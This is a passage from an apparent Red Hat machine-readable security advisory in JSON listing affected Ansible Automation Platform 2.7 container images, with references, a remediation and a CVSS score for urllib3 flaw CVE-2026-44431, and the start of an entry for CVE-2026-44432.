"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:daefffce756c8c7918377279ada50a9cc127ab0939ed308c786940d5dc42e0d9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:dfde61892d055e89b056f7fb8863f3a0961df2bb8890323b8301670fc8afc66b_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:bd7350b62eb0f2de274eafd7dc32e4cf3073bd597e282268ff17777b9fe5d102_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:fe72e508123fdd2795959017e5572689b039d5bdfc675dc45673c5586fceea17_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:abaebe0c1fbc2a013fad8ec411a449705c8a78759b82ddbe661afd99e90dada5_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:c4f9e3356a2217008bd6f69325ae74d547703f1bcfe39bd74737f30c6914f711_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:017495624b22a5825231dd70443dc9ab359da0df5ea16a5a04e0f4dc915b6e0f_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:fcb7685115cfbf0a10ef87d6bb7a43c251c207a4fd7a31c5908cad85b6ae0e1a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:d15bd832817f039fa3c09d6d74088254b6fae15a5efed7a88279a657b2f23f16_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:e78dd744714feae5ae944c759759bff17c061c7ed2d3bd1454ba763131ed6ee0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:de3d43a8d9a2cf0d533337e825b078205cc37b01c935a4f68ac152a8a7a7533c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:eca1f9bd16210653a372e34a4f40ca4d6330618a2acba64f6f7c2e8e95026da1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:a961d06200887f646ed797932c3159634581fe144e5f29f1fef47ddc859eed31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:bd28a84fe3b750313749ec80d44cac88c7b06408b0caceea08d303f51c1f559a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:3312c6acd7a577bd8b3ccda5a65f8505ff76e2acc7a46e7f290a49dfb53cfac4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:c738cf5ef020b44a404402ddd660afc3d418a758751f848068bda4bc5bce0e35_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:adca5f837877df04696709a4826ccae31e2fdc50aa8bc32fabb4ef40cd51f0ef_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fb8342f0f6b8322194bc357c7d9c9d89ef6ca052b88c5618bbf768f555a54b13_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:2fab408777ea512f3cf8ac57d5989fa0017f6352dcead3a320d348a3e2ac1004_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:c014148a6140721bb7733d5f30c7adbe3e2cc6f8a7cd6c3a939ab96f8c9420ee_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:121e0bfb87b57655db4a735762a26e23f1b3de7b105cbf09bb300043601c1b43_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:6a06579accd268ca5203edab2e46b89166ae6024507cc5b4bed2e126cdef7986_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d02ae0212655f8ef70afc7a0656a2fbc95468228b003f6940d01cf4abeb5325b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d10f226739a001a0efc0178f19a73fad722dc85484017d13f388f749a374ffea_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:302cf11b0faed78e07e863d4b1e7e31db47590b571239385475d8a4c3cda47dc_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:7dbf390d29d295f346662b605448a9748e24b8f541a84f55b6b7c81b87c46025_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:e6c019048612b124e9a2100220d46f242f0fd2302bbe42e674bf84c21a56b733_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:f07206e7881bd11636bebb95f7ec9a70cc817f07d7b34f792265a5ec91d4432b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:7007f666eadfd7294801e6412e624dbc4bd2288f13ea8820ee55e7552f471831_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:d71829d8bd9bfdba7d248e2e2cd5795139382947889b71bb96b27f7d443e1591_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ce4ef5c8af91d2056a034f9559a5d92742b18aea7aeaf03d2bacfa92d67c5b9b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ee347c1a7b52e512d6bdd65afda44f0e372abbaf4c1f81750f23fc473becf777_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3641db944490dd326c814487e1c10d5d9d079ba74f8321930ab277fe44b51705_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:7e6ea2d4253efb0aaabce270c56bf8ef84148592862608f501b639566b9996f0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:41c9292a512f44347fc348afd6846e7e8832abde31452ee12ec8eca235acdce4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:f30a9515d678d60e9ac035b876ecdaaa8a4852c87fe55e16bcabf598ad447b14_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:1ad72d1f577d63894eec4278c1b92b6e295cb3c0543b4dd2e93750c2cc83d535_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:5c5bc6761dbd47effea36014affa352bddd5a18696377967f1f50b75df2741fe_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:32560cdb08b7da9d671f9b035e595971c5bdf865c56eb6825b9a4910add1b9cf_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8ef224281fd23b4203da09336df25550db17b01f025e99b8e9821d4bc3ddedfc_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44431"
},
{
"category": "external",
"summary": "RHBZ#2477167",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477167"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44431",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44431"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44431",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44431"
},
{
"category": "external",
"summary": "https://github.com/urllib3/urllib3/security/advisories/GHSA-qccp-gfcp-xxvc",
"url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-qccp-gfcp-xxvc"
}
],
"release_date": "2026-05-13T15:20:24.588000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-15T08:51:13+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:3a04de6f43c1352f5df5c5a9e19fd8aad23d2921d23dcef8a9f5e121a87fe800_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:cdd7f08ba3846269e6932375c1a7bdb4ed3bfe062ba7bcd5a872def4293150a6_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25928"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:51ed36bb2a95df762fa0239faf7bcc70b68dbd5f744bd2094f5e29ecc6700eb3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:8426a97219763cb74366755416683d79e8b56c95da290b0fa2fff59a5db51db3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:0ddbc5f91472e5872912da6131e71df85e87b79ef8ea3d38bb4247f1456d4a00_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:f75e2056244899ae5e2ecab1404663bf554f7451cc521e0d7a75a2f40ecac7a1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:7dcd3a60624fa4f6c9f591ef8ffc48ba0f5152b7108a6070fa8f680c20168c95_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:a8135ef1879793f311f2661c380bd5fbbedc14a4d195aeaa5a4cb04ad4845f49_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:2211c0e7cd573bf30873329c46e91f98ff01fcb7e0753823d4c0517217c31ac3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:a6903f68684eb8f5bc688b75e390727b5ed48b864784657e49611966266c9f3f_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5ffa88952441ddab19ada1bd2603e3614b75d10ef51e38098c2d22d8b358b518_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:afca3fb56256dcb7cb04a67fb52bff0160064c65f901a70fa3e97ed30ddaab7a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:5e1a04dbcddc141f0026ccee871050cf974175b62c3d22b33e5ec3aec54128d3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:ddb59951ccb324d8bd6ae9c6a6093f211bcb08d8cac7c4fb10f191e421aa59d3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:55ad63ce31700829d0df23692d02cb7796404b122f790f9329f4b742c5f6783e_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:587ec88d08d4113f07778f81aae6de62c9e9d971b677b1375b547aa7dd1178c8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:5aa7b2e33b9480f45faf8b4686bfb264838b5c1c62c537c5a2ec7b5a8617ac49_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:830fa58a60fbd7f768e236b2052edd1d37fc7cf383a0ccd65483b09fa5b07bd2_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:a18f77ccf6c524f5d0c11d34d6787b22548194b6897abd491de85b00fc1befd3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:b58803576b7a2e119ffe83ceb252d8d402f1611c891c2c6ac7c4e0399acd848f_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:daefffce756c8c7918377279ada50a9cc127ab0939ed308c786940d5dc42e0d9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:dfde61892d055e89b056f7fb8863f3a0961df2bb8890323b8301670fc8afc66b_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:bd7350b62eb0f2de274eafd7dc32e4cf3073bd597e282268ff17777b9fe5d102_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:fe72e508123fdd2795959017e5572689b039d5bdfc675dc45673c5586fceea17_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:abaebe0c1fbc2a013fad8ec411a449705c8a78759b82ddbe661afd99e90dada5_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:c4f9e3356a2217008bd6f69325ae74d547703f1bcfe39bd74737f30c6914f711_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:017495624b22a5825231dd70443dc9ab359da0df5ea16a5a04e0f4dc915b6e0f_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:fcb7685115cfbf0a10ef87d6bb7a43c251c207a4fd7a31c5908cad85b6ae0e1a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:d15bd832817f039fa3c09d6d74088254b6fae15a5efed7a88279a657b2f23f16_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:e78dd744714feae5ae944c759759bff17c061c7ed2d3bd1454ba763131ed6ee0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:de3d43a8d9a2cf0d533337e825b078205cc37b01c935a4f68ac152a8a7a7533c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:eca1f9bd16210653a372e34a4f40ca4d6330618a2acba64f6f7c2e8e95026da1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:a961d06200887f646ed797932c3159634581fe144e5f29f1fef47ddc859eed31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:bd28a84fe3b750313749ec80d44cac88c7b06408b0caceea08d303f51c1f559a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:3312c6acd7a577bd8b3ccda5a65f8505ff76e2acc7a46e7f290a49dfb53cfac4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:c738cf5ef020b44a404402ddd660afc3d418a758751f848068bda4bc5bce0e35_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:3a04de6f43c1352f5df5c5a9e19fd8aad23d2921d23dcef8a9f5e121a87fe800_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:cdd7f08ba3846269e6932375c1a7bdb4ed3bfe062ba7bcd5a872def4293150a6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:adca5f837877df04696709a4826ccae31e2fdc50aa8bc32fabb4ef40cd51f0ef_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fb8342f0f6b8322194bc357c7d9c9d89ef6ca052b88c5618bbf768f555a54b13_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:2fab408777ea512f3cf8ac57d5989fa0017f6352dcead3a320d348a3e2ac1004_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:c014148a6140721bb7733d5f30c7adbe3e2cc6f8a7cd6c3a939ab96f8c9420ee_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:121e0bfb87b57655db4a735762a26e23f1b3de7b105cbf09bb300043601c1b43_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:6a06579accd268ca5203edab2e46b89166ae6024507cc5b4bed2e126cdef7986_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d02ae0212655f8ef70afc7a0656a2fbc95468228b003f6940d01cf4abeb5325b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d10f226739a001a0efc0178f19a73fad722dc85484017d13f388f749a374ffea_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:302cf11b0faed78e07e863d4b1e7e31db47590b571239385475d8a4c3cda47dc_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:7dbf390d29d295f346662b605448a9748e24b8f541a84f55b6b7c81b87c46025_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:e6c019048612b124e9a2100220d46f242f0fd2302bbe42e674bf84c21a56b733_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:f07206e7881bd11636bebb95f7ec9a70cc817f07d7b34f792265a5ec91d4432b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:7007f666eadfd7294801e6412e624dbc4bd2288f13ea8820ee55e7552f471831_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:d71829d8bd9bfdba7d248e2e2cd5795139382947889b71bb96b27f7d443e1591_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ce4ef5c8af91d2056a034f9559a5d92742b18aea7aeaf03d2bacfa92d67c5b9b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ee347c1a7b52e512d6bdd65afda44f0e372abbaf4c1f81750f23fc473becf777_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3641db944490dd326c814487e1c10d5d9d079ba74f8321930ab277fe44b51705_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:7e6ea2d4253efb0aaabce270c56bf8ef84148592862608f501b639566b9996f0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:41c9292a512f44347fc348afd6846e7e8832abde31452ee12ec8eca235acdce4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:f30a9515d678d60e9ac035b876ecdaaa8a4852c87fe55e16bcabf598ad447b14_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:1ad72d1f577d63894eec4278c1b92b6e295cb3c0543b4dd2e93750c2cc83d535_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:5c5bc6761dbd47effea36014affa352bddd5a18696377967f1f50b75df2741fe_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:32560cdb08b7da9d671f9b035e595971c5bdf865c56eb6825b9a4910add1b9cf_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8ef224281fd23b4203da09336df25550db17b01f025e99b8e9821d4bc3ddedfc_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "urllib3: urllib3: Information disclosure via cross-origin redirects forwarding sensitive headers"
},
{
"cve": "CVE-2026-44432",
"cwe": {
"id": "CWE-409",
"name": "Improper Handling of Highly Compressed Data (Data Amplification)"
},
"discovery_date": "2026-05-13T17:01:01.083841+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:51ed36bb2a95df762fa0239faf7bcc70b68dbd5f744bd2094f5e29ecc6700eb3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:8426a97219763cb74366755416683d79e8b56c95da290b0fa2fff59a5db51db3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:0ddbc5f91472e5872912da6131e71df85e87b79ef8ea3d38bb4247f1456d4a00_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:f75e2056244899ae5e2ecab1404663bf554f7451cc521e0d7a75a2f40ecac7a1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:7dcd3a60624fa4f6c9f591ef8ffc48ba0f5152b7108a6070fa8f680c20168c95_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:a8135ef1879793f311f2661c380bd5fbbedc14a4d195aeaa5a4cb04ad4845f49_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:2211c0e7cd573bf30873329c46e91f98ff01fcb7e0753823d4c0517217c31ac3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:a6903f68684eb8f5bc688b75e390727b5ed48b864784657e49611966266c9f3f_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5ffa88952441ddab19ada1bd2603e3614b75d10ef51e38098c2d22d8b358b518_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:afca3fb56256dcb7cb04a67fb52bff0160064c65f901a70fa3e97ed30ddaab7a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:5e1a04dbcddc141f0026ccee871050cf974175b62c3d22b33e5ec3aec54128d3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:ddb59951ccb324d8bd6ae9c6a6093f211bcb08d8cac7c4fb10f191e421aa59d3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:55ad63ce31700829d0df23692d02cb7796404b122f790f9329f4b742c5f6783e_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:587ec88d08d4113f07778f81aae6de62c9e9d971b677b1375b547aa7dd1178c8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:5aa7b2e33b9480f45faf8b4686bfb264838b5c1c62c537c5a2ec7b5a8617ac49_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:830fa58a60fbd7f768e236b2052edd1d37fc7cf383a0ccd65483b09fa5b07bd2_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:a18f77ccf6c524f5d0c11d34d6787b22548194b6897abd491de85b00fc1befd3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:b58803576b7a2e119ffe83ceb252d8d402f1611c891c2c6ac7c4e0399acd848f_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:bd7350b62eb0f2de274eafd7dc32e4cf3073bd597e282268ff17777b9fe5d102_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:fe72e508123fdd2795959017e5572689b039d5bdfc675dc45673c5586fceea17_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:abaebe0c1fbc2a013fad8ec411a449705c8a78759b82ddbe661afd99e90dada5_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:c4f9e3356a2217008bd6f69325ae74d547703f1bcfe39bd74737f30c6914f711_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:017495624b22a5825231dd70443dc9ab359da0df5ea16a5a04e0f4dc915b6e0f_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:fcb7685115cfbf0a10ef87d6bb7a43c251c207a4fd7a31c5908cad85b6ae0e1a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:d15bd832817f039fa3c09d6d74088254b6fae15a5efed7a88279a657b2f23f16_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:e78dd744714feae5ae944c759759bff17c061c7ed2d3bd1454ba763131ed6ee0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:de3d43a8d9a2cf0d533337e825b078205cc37b01c935a4f68ac152a8a7a7533c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:eca1f9bd16210653a372e34a4f40ca4d6330618a2acba64f6f7c2e8e95026da1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:a961d06200887f646ed797932c3159634581fe144e5f29f1fef47ddc859eed31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:bd28a84fe3b750313749ec80d44cac88c7b06408b0caceea08d303f51c1f559a_amd64",
